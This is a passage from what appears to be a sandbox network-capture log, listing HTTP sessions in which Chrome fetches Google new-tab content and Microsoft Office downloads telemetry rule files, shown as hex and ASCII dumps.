2024-12-04 11:17:23 UTC	1367	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:22 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-IRYxTRxGSDYMvjBoQAZuVQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Save-Data Accept-CH: Downlink Accept-CH: ECT Accept-CH: RTT Accept-CH: Device-Memory Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-04 11:17:23 UTC	23	IN	Data Raw: 33 32 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 72 6f 63 6b 73 74 61 Data Ascii: 323)]}'["",["rocksta
2024-12-04 11:17:23 UTC	787	IN	Data Raw: 72 20 67 61 6d 65 73 20 67 74 61 20 36 20 74 72 61 69 6c 65 72 22 2c 22 33 30 20 75 6e 64 65 72 20 33 30 22 2c 22 73 6e 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 61 73 74 65 72 6f 69 64 20 68 69 74 74 69 6e 67 20 65 61 72 74 68 20 6e 61 73 61 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 63 79 62 65 72 20 6d 6f 6e 64 61 79 20 64 65 61 6c 73 22 2c 22 6d 65 6d 70 68 69 73 20 67 72 69 7a 7a 6c 69 65 73 20 76 73 20 64 61 6c 6c 61 73 20 6d 61 76 65 72 69 63 6b 73 22 2c 22 61 6c 61 73 6b 61 20 66 69 73 68 69 6e 67 20 62 6f 61 74 20 63 61 70 73 69 7a 65 64 22 2c 22 7a 6f 64 69 61 63 20 73 69 67 6e 73 20 72 65 61 64 79 20 66 6f 72 20 73 6f 75 6c 6d 61 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 Data Ascii: r games gta 6 trailer","30 under 30","snow storm weather forecast","asteroid hitting earth nasa","nintendo switch cyber monday deals","memphis grizzlies vs dallas mavericks","alaska fishing boat capsized","zodiac signs ready for soulmate"],["","","","",""
2024-12-04 11:17:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49799	142.250.181.68	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 11:17:23 UTC	1018	IN	HTTP/1.1 200 OK Version: 700238841 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 04 Dec 2024 11:17:23 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-04 11:17:23 UTC	372	IN	Data Raw: 32 66 66 62 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2ffb)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 38 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700318,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 Data Ascii: hrow Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003
2024-12-04 11:17:23 UTC	1390	IN	Data Raw: 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 Data Ascii: .querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.me\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"
2024-12-04 11:17:23 UTC	799	IN	Data Raw: 75 72 6e 20 5f 2e 6f 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3b 66 6f 72 28 3b 62 5c 75 30 30 33 64 61 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 61 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 7d 3b Data Ascii: urn _.oe(document,a)};_.oe\u003dfunction(a,b){b\u003dString(b);a.contentType\u003d\u003d\u003d\"application/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.se\u003dfunction(a){let b;for(;b\u003da.firstChild;)a.removeChild(b)};

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49798	142.250.181.68	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 11:17:23 UTC	933	IN	HTTP/1.1 200 OK Version: 700238841 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 04 Dec 2024 11:17:23 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-04 11:17:23 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-04 11:17:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:23 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:22 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111722Z-1746fd949bdl6zq5hC1EWRf3ws00000000sg000000005wsr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:23 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:23 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:22 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111722Z-1746fd949bd6ztf6hC1EWRvq2s00000000ng0000000092g8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:23 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:23 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:23 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 4da954f1-f01e-003f-58cd-45d19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111723Z-1746fd949bdkw94lhC1EWRxuz4000000015g000000008vuk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
